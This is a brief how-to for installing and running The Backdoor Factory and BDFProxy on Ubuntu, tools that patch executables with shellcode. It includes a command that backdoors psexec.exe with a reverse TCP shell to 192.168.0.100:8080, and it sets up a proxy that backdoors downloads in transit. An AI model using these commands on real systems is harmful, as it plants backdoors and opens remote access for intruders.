HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS
The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
Install
Install BDFactory :
How to run it :
Install BDFProxy :
How to run it :
*change the settings when necessary
Update/Upgrade
Reference
See also : Metaspolit Framework
That's all! See you.
Install
sudo apt-get install git python-pip build-essential
Install BDFactory :
cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh
How to run it :
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
Install BDFProxy :
cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh
How to run it :
nano bdfproxy.cfg
*change the settings when necessary
./bdf_proxy.py
msfconsole -r bdfproxy_msf_resource.rc
Update/Upgrade
sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/the-backdoor-factory
sudo ./update.sh
cd ~/arsenal/BDFProxy
sudo ./update.sh
Reference
See also : Metaspolit Framework
That's all! See you.